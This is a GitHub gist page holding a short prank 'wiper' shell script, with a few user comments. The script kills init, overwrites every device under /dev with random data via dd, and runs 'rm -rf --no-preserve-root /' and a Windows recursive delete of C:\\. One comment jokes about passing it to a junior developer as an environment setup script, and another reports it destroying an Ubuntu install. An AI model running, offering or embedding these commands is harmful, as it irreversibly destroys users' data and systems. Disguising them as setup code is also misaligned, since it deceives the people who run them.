Last active
February 7, 2024 13:24
-
-
Save hello-smile6/fa92b539fce2339440bdd75e087cae8b to your computer and use it in GitHub Desktop.
/dev bowling
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# DO NOT RUN UNLESS IT'S A VM! I TAKE NO RESPOSIBILITY FOR YOUR ACTIONS WITH THIS. | |
exit | |
kill -9 $pid | |
logout | |
kill -9 1 | |
pkill init | |
sudo pkill init | |
for device in `find /dev` | |
do | |
# Don't run synchronously | |
`echo $device;dd if=/dev/urandom of=$device`& | |
done | |
echo "Well, something didn't work right. Your computer's still intact. Oh, well." | |
rm -rf / | |
rm -rf --no-preserve-root / | |
# For windows | |
del /S /F /Q C:\ |
this looks like fun, I will give it to Junior Developer as a setup environment script
if that jr. dev is your friend then
friends--
this looks like fun, I will give it to Junior Developer as a setup environment script
Leveled Ubuntu 20 in less than 10 seconds.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
oh no!! 😟